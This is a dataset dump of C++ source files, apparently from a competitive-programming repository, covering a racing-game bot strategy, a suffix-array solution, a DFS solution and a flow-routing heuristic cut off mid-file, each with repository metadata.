return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1) + 0.2;\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279;\n };\n double MAAAAAGIC = interpolation(temp2);\n if (temp2 > 2)\n MAAAAAGIC = -0.25;\n if (temp2 < 0.6)\n MAAAAAGIC = interpolation(0.6);\n\n double nextWaypointX = targetX;\n double nextWaypointY = targetY;\n\n double cornerTileOffset = MAAAAAGIC * tileSize;\n auto changeCoords = [&](int i, int j) {\n if (snake || drift)\n return;\n if (pj == tj)\n swap(pi, fi),\n swap(pj, fj);\n switch (a[i][j])\n {\n case LEFT_TOP_CORNER:\n lt:\n\n nextWaypointX += cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case RIGHT_TOP_CORNER:\n rt:\n\n nextWaypointX -= cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case LEFT_BOTTOM_CORNER:\n lb:\n\n nextWaypointX += cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case RIGHT_BOTTOM_CORNER:\n rb:\n\n nextWaypointX -= cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case TOP_HEADED_T:\n th:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rb, lb);\n break;\n case BOTTOM_HEADED_T:\n bh:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rt, lt);\n break;\n case RIGHT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, lb, lt);\n break;\n case LEFT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, rb, rt);\n break;\n case CROSSROADS:\n if (pi == ti && pi == fi);\n else if (pj == tj && pj == fj);\n else go(pj + 1 == tj, th, bh);\n default:\n break;\n }\n };\n changeCoords(ti, tj);\n bool B = false;\n double bonusMin = 1000000;\n Bonus bonus;\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\n for (Bonus b : 
world.getBonuses())\n if (self.getDistanceTo(b) < distToNext)\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && (fabs(self.getAngleTo(b)) < PI / 27 && fabs(self.getAngleTo(targetX, targetY) < PI / 36) || (bonus.getType() == PURE_SCORE || (bonus.getType() == REPAIR_KIT && self.getDurability() < 20)) && self.getAngleTo(b) < PI / 5) && self.getDistanceTo(b) > tileSize * 0.75))\n {\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\n pair<int, int> qwerty = {ti, tj};\n for (auto point : path)\n {\n if (point == qwerty)\n break;\n if (point == bbb)\n {\n B = true;\n if (bonusMin > self.getDistanceTo(b))\n bonus = b,\n bonusMin = self.getDistanceTo(b);\n }\n }\n }\n if (B)\n {\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\n nextWaypointX = bonus.getX();\n nextWaypointY = bonus.getY();\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - height - bonus.getWidth() / 2 - 78);\n nextWaypointX = max(nextWaypointX, get(bbb.first) + height + bonus.getWidth() / 2 + 78);\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\n }\n if (is32(path))\n tie(nextWaypointX, nextWaypointY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\n\n auto cars = world.getCars();\n sort(cars.begin(), cars.end(), [&self](const Car& aaa, const Car& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\n for (Car car : world.getCars())\n if (!car.isFinishedTrack())\n if ((car.getDurability() == 0 || hypot(car.getSpeedX(), car.getSpeedY()) * 1.05 < speedModule || fabs(car.getAngleTo(self)) < PI / 2 || speedModule < 10) && world.getTick() > 300)\n {\n pair<int, int> ccc = {car.getX() / tileSize, car.getY() / tileSize};\n pair<int, int> qwerty = {ti, tj};\n int index = 0;\n for (auto point : path)\n {\n if (point == qwerty)\n break;\n if (point == ccc && index + 1 < int(path.size()) 
&& (self.getDistanceTo(car) > tileSize || speedModule < 10))\n {\n if (isHorizontal(point, path[index + 1]))\n {\n if (targetX <= self.getX() && self.getX() <= car.getX() || targetX >= self.getX() && self.getX() >= car.getX())\n continue;\n double lower = get(ccc.second) + 80 + height + 15;\n double lower2 = car.getY() - height - 15 - car.getWidth();\n double upper = get(ccc.second + 1) - 80 - height - 15;\n double upper2 = car.getY() + height + 15 + car.getWidth();\n double cgy = car.getY();\n double dist1 = self.getDistanceTo(car.getX(), lower) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower);\n double dist2 = self.getDistanceTo(car.getX(), lower2) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower2);\n double dist3 = self.getDistanceTo(car.getX(), upper) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper);\n double dist4 = self.getDistanceTo(car.getX(), upper2) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper2);\n nextWaypointX = car.getX();\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\n }\n if (isVertical(point, path[index + 1]))\n {\n if (targetY <= self.getY() && self.getY() <= car.getY() || targetY >= self.getY() && self.getY() >= car.getY())\n continue;\n double lower = get(ccc.first) + 80 + height + 15;\n double lower2 = car.getX() - height - 15 - car.getWidth();\n double upper = get(ccc.first + 1) - 80 - height - 15;\n double upper2 = car.getX() + height + 15 + car.getWidth();\n double cgy = car.getX();\n double dist1 = self.getDistanceTo(car.getY(), lower) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower);\n double dist2 = self.getDistanceTo(car.getY(), lower2) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower2);\n double dist3 = self.getDistanceTo(car.getY(), upper) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper);\n double dist4 = self.getDistanceTo(car.getY(), upper2) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper2);\n nextWaypointY = car.getY();\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\n }\n break;\n }\n ++index;\n }\n\n }\n auto os = world.getOilSlicks();\n sort(os.begin(), os.end(), [&self](const OilSlick& aaa, const OilSlick& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\n for (auto o : os)\n {\n pair<int, int> ccc = {o.getX() / tileSize, o.getY() / tileSize};\n pair<int, int> qwerty = {ti, tj};\n int index = 0;\n for (auto point : path)\n {\n if (point == qwerty)\n break;\n if (point == ccc && index + 1 < int(path.size()) && self.getDistanceTo(o) > tileSize && self.getDistanceTo(o) < self.getDistanceTo(nextWaypointX, nextWaypointY))\n {\n if (isHorizontal(point, path[index + 1]))\n {\n if (targetX <= self.getX() && self.getX() <= o.getX() || targetX >= self.getX() && self.getX() >= o.getX())\n continue;\n double lower = get(ccc.second) + 80 + height + 15;\n double lower2 = o.getY() - height - 15 - o.getRadius();\n double upper = get(ccc.second + 1) - 80 - height - 15;\n double upper2 = o.getY() + height + 15 + o.getRadius();\n double cgy = o.getY();\n double dist1 = self.getDistanceTo(o.getX(), lower) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower);\n double dist2 = self.getDistanceTo(o.getX(), lower2) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower2);\n double dist3 = self.getDistanceTo(o.getX(), upper) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper);\n double dist4 = self.getDistanceTo(o.getX(), upper2) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper2);\n nextWaypointX = o.getX();\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\n }\n if (isVertical(point, path[index + 1]))\n {\n if (targetY <= self.getY() && self.getY() <= o.getY() || targetY >= self.getY() && self.getY() >= o.getY())\n continue;\n double lower = get(ccc.first) + 80 + height + 15;\n double lower2 = o.getX() - height - 15 - o.getRadius();\n double upper = get(ccc.first + 1) - 80 - height - 15;\n double upper2 = o.getX() + height + 15 + o.getRadius();\n double cgy = o.getX();\n double dist1 = self.getDistanceTo(o.getY(), lower) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower);\n double dist2 = self.getDistanceTo(o.getY(), lower2) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower2);\n double dist3 = self.getDistanceTo(o.getY(), upper) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper);\n double dist4 = self.getDistanceTo(o.getY(), upper2) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper2);\n nextWaypointY = o.getY();\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\n }\n break;\n }\n ++index;\n }\n\n }\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\n //double check = self.getAngleTo(getCenter(ti), getCenter(tj));\n //if ((fabs(check - PI) < PI / 6 || fabs(check + PI) < PI / 6) && planB == 0 && forceRight == 0 && forceBack == 0)\n //planB = PLANB,\n //power *= -1;\n //if (fabs(check) < PI / 3 && planB && forceRight == 0 && forceBack == 0)\n //power *= -1,\n //planB = 0;\n auto getTurn = [&](double dod)\n {\n return angleToWaypoint * dod * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\n };\n bool okSnake = false;\n int count = 0;\n if (snake && path.size() >= 3)\n {\n vector<int> fff = {\n directions[make_pair(path[0].first - path[1].first, path[0].second - path[1].second)],\n directions[make_pair(path[1].first - path[2].first, path[1].second - path[2].second)]\n };\n for (int i = 2; i + 1 < path.size(); ++i)\n if (directions[make_pair(path[i].first - path[i + 1].first, path[i].second - path[i + 1].second)] == fff[i % 2])\n count++;\n else\n break;\n\n okSnake = count >= 9;\n }\n if (forceBack)\n {\n forceBack--;\n if (forceBack == 0)\n {\n power *= -1;\n forceRight = FORCE_RIGHT;\n turn *= -1;\n }\n }\n\n else if (forceRight)\n {\n if (forceRight > FORCE_RIGHT - BREAK)\n move.setBrake(true);\n forceRight--;\n if (forceRight == 0 || planB)\n planB = 0;\n }\n if (forceBack == 0 && forceRight == 0)\n {\n if (changed && fabs(prevDistance - distToNext) < eps)\n {\n countOfFails++;\n {\n if (countOfFails > COUNT_OF_FAILS)\n {\n globalFail++;\n countOfFails = 0;\n forceBack = FORCE_BACK;\n turn = getTurn(32);\n if (isCorner(a[si][sj]))\n {\n turn = turn > 0 ? 1 : -1;\n if (globalFail > GLOBAL_FAIL)\n turn *= -1;\n }\n else\n if (globalFail > GLOBAL_FAIL)\n turn = turn > 0 ? 1 : -1;\n turn *= -1;\n power *= -1;\n }\n }\n }\n else\n {\n if (force)\n force--;\n forceSlow = path.size() <= 4 ? 
14 : 100;\n if (world.getTick() <= tickTarget + 200)\n forceSlow = badMap * 20;\n if (is4(path))\n forceSlow *= 1.5;\n countOfFails = 0;\n globalFail = 0;\n\n if (forceRight == 0)\n turn = getTurn(36);\n double dd = speedModule / MAX_SPEED;\n //if (is32(path))\n //dd *= 1.3;\n if (is3_2(path))\n dd /= 2;\n if (is212(path))\n dd /= 2;\n if (is41(path))\n dd *= 1.2;\n bool fas = is131(path) && speedModule > 16.5 || world.getMapName() == \"map14\" && speedModule > 18 && count < 3;\n\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find(S) == bad.end()) || speedModule > forceSlow || (bad.find(S) != bad.end() && speedModule > 11.5) || fas)\n move.setBrake(true);\n }\n }\n if (forceRight == 0 && forceBack == 0 && planB)\n {\n if (angleToWaypoint > 0)\n angleToWaypoint = PI - angleToWaypoint;\n else\n angleToWaypoint = -PI + angleToWaypoint;\n turn = getTurn(32);\n\n }\n move.setWheelTurn(turn);\n move.setEnginePower(power);\n for (auto car : world.getCars())\n if (!car.isTeammate())\n {\n if (world.getTick() > 250 && self.getDistanceTo(car) <= tileSize * 2)\n {\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW / 2 && !car.isFinishedTrack() && (hypot(car.getSpeedX(), car.getSpeedY()) < 5 || fabs(car.getAngle() - self.getAngle()) < PI / 60 || self.getDistanceTo(car) < tileSize))\n move.setThrowProjectile(true);\n }\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[wx][wy]) && planB == 0)\n move.setSpillOil(true);\n }\n\n if (forceRight == 0 && forceBack == 0 && world.getTick() > beforeTick && (distToNext > tileSize * 5 || (okSnake && bad.find(S) == bad.end() && speedModule > 20)) && planB == 0 && fabs(angleToWaypoint) < PI / 90)\n move.setUseNitro(true);\n if (ct == BUGGY)\n return;\n#ifdef vis\n visual.beginPre();\n auto vvv = world.getTilesXY();\n for (int i = 0; i < vvv.size(); ++i)\n for (int j = 0; j < vvv[0].size(); ++j)\n if (vvv[i][j] == UNKNOWN)\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0xBB0000);\n auto HSVtoRgb = 
[](double H, double S, double V)\n {\n double f, p, q, t;\n S = (S > 1) ? S / 100 : S;\n V = (V > 1) ? V / 100 : V;\n int lH = int(H / 60);\n f = H / 60 - lH;\n p = V * (1 - S);\n q = V * (1 - S * f);\n t = 1 - (1 - f) * S;\n double R, G, B;\n \n switch (lH)\n {\n case 0: R = V; G = t; B = p; break;\n case 1: R = q; G = V; B = p; break;\n case 2: R = p; G = V; B = t; break;\n case 3: R = p; G = q; B = V; break;\n case 4: R = t; G = p; B = V; break;\n case 5: R = V; G = p; B = q; break;\n }\n int r = R * 0xFF;\n int g = G * 0xFF;\n int b = B * 0xFF;\n return r << 16 | g << 8 | b;\n };\n\n int index = 0;\n auto sdjkflghsldkfj = world.getWaypoints();\n for (auto p : sdjkflghsldkfj)\n visual.fillRect(get(p[0]), get(p[1]), get(p[0] + 1), get(p[1] + 1), HSVtoRgb(index++ * 360 / sdjkflghsldkfj.size(), 1, 1));\n\n visual.fillCircle(getCenter(ti), getCenter(tj), 400, 0x54618f);\n visual.line(self.getX(), self.getY(), nextWaypointX, nextWaypointY);\n char sss[45];\n sprintf(sss, \"%d %d s:%.2f a:%.2f t:%.2f\", pd, d, speedModule, angleToWaypoint, turn);\n visual.text(self.getX() + 120, self.getY() + 120, sss);\n sss[44] = 0;\n for (int i = 1; i < min(15, int(path.size())); ++i)\n visual.line(getCenter(path[i - 1].first), getCenter(path[i - 1].second), getCenter(path[i].first), getCenter(path[i].second), 0xff0000);\n visual.line(getCenter(pi), getCenter(pj), getCenter(ti), getCenter(tj), 0x00ff00);\n visual.line(getCenter(ti), getCenter(tj), getCenter(fi), getCenter(fj), 0x00ff00);\n visual.endPre();\n visual.beginPost();\n visual.endPost();\n#endif\n }\n}\n\nMyStrategy::MyStrategy() \n{\n#undef bad\n#undef old\n#undef once\n bad.resize(2);\n old.resize(2);\n once.resize(2);\n directions[make_pair(1, 0)] = RIGHT;\n directions[make_pair(-1, 0)] = LEFT;\n directions[make_pair(0, 1)] = DOWN;\n directions[make_pair(0, -1)] = UP;\n#define rht RIGHT_HEADED_T\n#define lht LEFT_HEADED_T\n#define tht TOP_HEADED_T \n#define bht BOTTOM_HEADED_T\n#define cr CROSSROADS\n dir[VERTICAL][UP] 
= dir[VERTICAL][DOWN] = true;\n dir[HORIZONTAL][LEFT] = dir[HORIZONTAL][RIGHT] = true;\n\n dir[LEFT_TOP_CORNER][RIGHT] = dir[LEFT_TOP_CORNER][DOWN] = true;\n dir[RIGHT_TOP_CORNER][LEFT] = dir[RIGHT_TOP_CORNER][DOWN] = true;\n dir[LEFT_BOTTOM_CORNER][RIGHT] = dir[LEFT_BOTTOM_CORNER][UP] = true;\n dir[RIGHT_BOTTOM_CORNER][LEFT] = dir[RIGHT_BOTTOM_CORNER][UP] = true;\n\n dir[rht][UP] = dir[rht][DOWN] = dir[rht][RIGHT] = true;\n dir[lht][DOWN] = dir[lht][UP] = dir[lht][LEFT] = true;\n dir[bht][DOWN] = dir[bht][LEFT] = dir[bht][RIGHT] = true;\n dir[tht][UP] = dir[tht][LEFT] = dir[tht][RIGHT] = true;\n\n dir[cr][DOWN] = dir[cr][UP] = dir[cr][LEFT] = dir[cr][RIGHT] = true;\n freopen(\"lol\", \"w\", stdout);\n#ifdef debug\n writeln(FUUUUU);\n#endif\n}\n" }, { "alpha_fraction": 0.37383177876472473, "alphanum_fraction": 0.39307311177253723, "avg_line_length": 19.438201904296875, "blob_id": "71a009ad3491d23c3076a3a34343c8aa69f66aba", "content_id": "699037bb6b951a6a3f97cc703e858b870df80699", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 88, "num_lines": 89, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.23/J.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <iostream>\n#include <algorithm>\n#include <cstring>\n\nusing namespace std;\n\n#define REP(i, n) for (int i = 0; i < (int)(n); ++i)\n\nconst int MAXN = 500002;\nstring s;\nint n, gap;\nint sa[MAXN], pos[MAXN], tmp[MAXN], lcp[MAXN];\n\nbool sufCmp(int i, int j)\n{\n if (pos[i] != pos[j])\n return pos[i] < pos[j];\n i += gap;\n j += gap;\n return (i < n && j < n) ? 
pos[i] < pos[j] : i > j;\n}\n\nvoid buildsA()\n{\n n = s.size();\n// s.push_back('!');\n REP(i, n)\n sa[i] = i,\n pos[i] = s[i];\n for (gap = 1;; gap *= 2)\n {\n sort(sa, sa + n, sufCmp);\n REP(i, n - 1)\n tmp[i + 1] = tmp[i] + sufCmp(sa[i], sa[i + 1]);\n REP(i, n)\n pos[sa[i]] = tmp[i];\n if (tmp[n - 1] == n - 1)\n break;\n }\n}\n\nvoid buildLCP()\n{\n for (int i = 0, k = 0; i < n; ++i)\n if (pos[i] != n - 1)\n {\n for (int j = sa[pos[i] + 1]; max(i + k, j + k) < n && s[i + k] == s[j + k];)\n ++k;\n lcp[pos[i]] = k;\n if (k)\n --k;\n }\n}\n\nint main()\n{\n //freopen(\"input.in\", \"r\", stdin);\n int z;\n std::cin >> z;\n if (z == 1)\n {\n printf(\"0\");\n return 0;\n }\n std::cin >> s;\n int countP = 0, countL = 0, posP = -1, posL = -1;\n REP(i, s.size())\n s[i] == 'L' ? countL++, posL = i : (countP++, posP = i);\n buildsA();\n buildLCP();\n int pos[MAXN];\n REP(i, n)\n pos[sa[i]] = i;\n int ans[MAXN];\n REP(i, n - 1)\n if (pos[i] == 0)\n ans[i] = lcp[pos[i]];\n else\n ans[i] = max(lcp[pos[i]], lcp[pos[i] - 1]);\n ans[n - 1] = 1;\n if (countL == 1)\n ans[posL] = 0;\n if (countP == 1)\n ans[posP] = 0;\n REP(i, n)\n printf(\"%d\\n\", ans[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.3828032910823822, "alphanum_fraction": 0.40812721848487854, "avg_line_length": 17.866666793823242, "blob_id": "3aa58f336230ff46e71945581be67e2d05bd0315", "content_id": "f0cfc797b2be513203c64c609cd0fc0c6e9f199a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1698, "license_type": "no_license", "max_line_length": 57, "num_lines": 90, "path": "/trash/typycal_proger/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#include <set>\n#include <ctime>\n\nusing namespace std;\nvector< vector<int> > edges;\nbool vertex[502][502];\nbool edge[502][502];\nvector<int> ss;\nint n, m;\n\n\nvoid dfs(int v, int 
d)\n{\n if (v == n - 1 || ss[d] < v)\n throw 1;\n if (clock()*100000/CLOCKS_PER_SEC >= 1900)\n {\n throw 0;\n }\n for (int i = 0; i < edges[v].size(); i++)\n {\n int u = edges[v][i];\n if (!vertex[u][d + 1] && (i != 0 || !edge[v][d]))\n dfs(u, d + 1); else\n continue;\n }\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n //freopen(\"output.out\", \"w+\", stdout);\n int q;\n scanf(\"%d %d\\n%d\\n\", &n, &m, &q);\n char c;\n edges.resize(n + 1);\n vertex[q][0] = true;\n if (q == 0)\n {\n printf(\"NO\\n\");\n return 0;\n }\n ss.push_back(q);\n for (int i = 0; i < n; i++)\n {\n if (i != n - 1)\n edges[i].push_back(i + 1);\n scanf(\"%c\", &c);\n if (c == 'L')\n {\n q--;\n edge[q][i] = true;\n } else\n {\n edge[q][i] = true;\n q++;\n }\n ss.push_back(q);\n vertex[q][i + 1] = true;\n }\n int x, y;\n for (int i = 0; i < m; i++)\n {\n scanf(\"%d %d\\n\", &x ,&y);\n if (x < y)\n edges[x].push_back(y); else\n edges[y].push_back(x);\n }\n try\n {\n dfs(0, 0);\n }\n catch(int e)\n {\n if (e == 1)\n printf(\"YES\\n\"); else\n printf(\"NO\\n\");\n return 0;\n }\n // fclose(stdin);\n // fclose(stdout);\n printf(\"NO\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.4525647759437561, "alphanum_fraction": 0.46586036682128906, "avg_line_length": 26.495283126831055, "blob_id": "d6593161d3601cade5e927dfd56b0db787cf5a4f", "content_id": "8c45ebc00c573f4c681b570f45beaa389ef72190", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11658, "license_type": "no_license", "max_line_length": 174, "num_lines": 424, "path": "/CodeForce/1576/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#ifdef ONLINE_JUDGE\n#pragma GCC optimize(\"Ofast\")\n#endif\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//}}}\n\n[[maybe_unused]] const int GFL = 100;\n[[maybe_unused]] const int NFL = 200;\n\nstruct edge // {{{\n{\n int id;\n int g;\n int from;\n int to;\n int d;\n int c;\n int now = 0;\n\n int getTo(int u) const\n {\n return from ^ to ^ u;\n }\n\n edge() {}\n\n friend istream& operator>>(istream& in, edge& e) {\n return in >> e.id >> e.g >> e.from >> e.to >> e.d >> e.c;\n }\n \n friend ostream& operator<<(ostream& out, const edge& e) {\n return out << \"Edge: \" << e.id << \", g \" << e.g << \", from \" << e.from << \", to \" << e.to << \", d \" << e.d << \", c \" << e.c << \", now \" << e.now;\n }\n};\n\nstruct node\n{\n int id;\n vector<int> out;\n unordered_set<int> restrictions;\n int now = 0;\n\n node() {}\n\n void addRestriction(int fromEdge, int toEdge)\n {\n restrictions.insert(getHash(fromEdge, toEdge));\n }\n\n int getHash(int fromEdge, int toEdge) const\n {\n return (min(fromEdge, toEdge) << 16) + max(fromEdge, toEdge);\n }\n\n bool can(int fromEdge, int toEdge) const \n {\n if (fromEdge == -1 || toEdge == -1) return true;\n return restrictions.count(getHash(fromEdge, toEdge)) == 0;\n }\n\n friend ostream& operator<<(ostream& out, const node& e) {\n return out << \"Node \" << e.id << \", out \" << e.out.size() << \", restrictions \" << e.restrictions.size() << \", now \" << e.now;\n }\n\n};\n\nstruct flow\n{\n int id;\n int from;\n int to;\n int r;\n vector<int> path;\n\n flow() {}\n\n friend istream& operator>>(istream& in, flow& e) {\n return in >> e.id >> e.from >> e.to >> e.r;\n }\n \n friend ostream& operator<<(ostream& out, const flow& e) {\n return out << \"Flow \" << e.id << \", from \" << e.from << \", to \" << e.to << \", rate \" << e.r;\n }\n\n}; // }}}\n\nint n, m, c, F, g = 4500, TREES = 1;\n\nvector<edge> edges; // 
{{{\nvector<flow> flows;\nvector<int> groups;\nvector<node> nodes;\nunordered_set<int> ggg;\nvector<int> nnn;\n\nbool checkCannotUseEdge(int u, int v, int fromEdge, const int& rate, const edge& e) {\n return e.now + rate > e.c || !nodes[u].can(e.id, fromEdge) || groups[e.g] == GFL || nodes[v].now == NFL;\n};\n\nstruct tree\n{\n vector<int> d;\n vector<pii> p;\n vector<bool> used;\n int root;\n int c = 12000;\n int fails = 0;\n int to = -1;\n\n tree()\n {\n d.resize(n, MOD);\n p.resize(n, {-1, -1});\n used.resize(n, false);\n }\n\n tree(int root, int c, int to) : root(abs(root) % n), to(to)\n {\n c = abs(c) % 12001;\n this->c = c;\n d.resize(n, MOD);\n p.resize(n, {-1, -1});\n used.resize(n, false);\n bfs(this->root, this->c, this->to);\n }\n\n void reset(int root, int c = 0, int to = -1)\n {\n fails = 0;\n if (!c)\n c = abs(int(rng())) % 12001;\n this->c = c;\n\n fori(n)\n d[i] = MOD,\n p[i] = {-1, -1},\n used[i] = false;\n this->root = abs(root) % n;\n this->to = to;\n bfs(this->root, this->c, this->to);\n }\n\n void bfs(int root, int rate, int to = -1)\n {\n queue<tuple<int, int, int>> s;\n d[root] = 0;\n s.push({0, root, -1});\n while (s.size())\n {\n auto [_, u, fromEdge] = s.front();\n s.pop();\n if (u == to) break;\n used[u] = true;\n for (const int& eid: nodes[u].out)\n {\n const auto& e = edges[eid];\n int v = e.getTo(u);\n if (used[v] || checkCannotUseEdge(u, v, fromEdge, rate, e))\n continue;\n int cur = d[u] + 1;\n if (cur < d[v])\n {\n d[v] = cur;\n p[v] = {u, e.id};\n s.push({d[v], v, e.id});\n }\n }\n }\n }\n\n vector<int> getPath(int from, int to)\n {\n if (nodes[from].now == NFL) return vector<int>();\n if (nodes[to].now == NFL) return vector<int>();\n if (d[from] == MOD) return vector<int>();\n if (d[to] == MOD) return vector<int>();\n\n vector<int> p1, p2;\n auto add = [&](vector<int>& path, int& u) {\n path.pb(p[u].second);\n u = p[u].first;\n };\n while (d[from] > d[to]) add(p1, from);\n while (d[from] < d[to]) add(p2, to);\n while (d[from] && 
from != to)\n {\n add(p1, from);\n add(p2, to);\n }\n reverse(all(p2));\n copy(all(p2), back_inserter(p1));\n return p1;\n }\n\n bool addPath(flow& f)\n {\n bool ok = addPathImpl(f);\n fails += !ok;\n if (fails >= 10)\n reset(root);\n return ok;\n }\n\n bool addPathImpl(flow& f)\n {\n vector<int> path = getPath(f.from, f.to);\n if (!path.size()) return false;\n\n ggg.clear();\n nnn.clear();\n\n int u = f.from;\n int fromEdge = -1;\n for (int& eid: path)\n {\n edge& e = edges[eid];\n int v = e.getTo(u);\n if (checkCannotUseEdge(u, v, fromEdge, f.r, e))\n return false;\n nnn.pb(u);\n ggg.insert(e.g);\n u = v;\n fromEdge = eid;\n }\n\n u = f.from;\n for (int& eid: path)\n {\n edge& e = edges[eid];\n e.now += f.r;\n u = e.getTo(u);\n }\n for (int gg: ggg)\n groups[gg]++;\n\n nodes[u].now++;\n for (int nn: nnn)\n nodes[nn].now++;\n f.path = path;\n return true;\n }\n\n friend ostream& operator<<(ostream& out, const tree& t)\n {\n out << \"Tree: root \" << t.root << \", d =\";\n for (int x: t.d)\n out << \" \" << x;\n return out;\n }\n}; // }}}\n\nvoid run()\n{\n double time = clock(); // {{{\n readln(n, m, c, F);\n nodes.resize(n);\n edges.resize(m);\n groups.resize(g + 1);\n flows.resize(F);\n fori(n) nodes[i].id = i;\n\n { //READ INPUT\n readln(edges);\n for (const auto& e: edges)\n nodes[e.from].out.pb(e.id),\n nodes[e.to].out.pb(e.id);\n forn(q, c)\n {\n ints(id, u, v);\n nodes[id].addRestriction(u, v);\n }\n readln(flows);\n fori(n)\n shuffle(all(nodes[i].out), rng);\n //sort(all(nodes[i].out), [&](int a, int b) {\n //return edges[a].c > edges[b].c;\n //});\n } // }}}\n\n tree t(0, 0, -1);\n shuffle(all(flows), rng);\n //sort(all(flows), [&](const flow& a, const flow& b) {\n //return tuple(t.d[a.from], a.r) < tuple(t.d[b.from], b.r);\n //return tuple(a.from, a.to) < tuple(b.from, b.to);\n //});\n vector<tree> trees(1);\n //fori(TREES)\n //trees.pb(tree(0, flows[0].r * 3));\n\n fori(F)\n {\n auto& f = flows[i];\n if (1000.0 * (clock() - time) / CLOCKS_PER_SEC > 
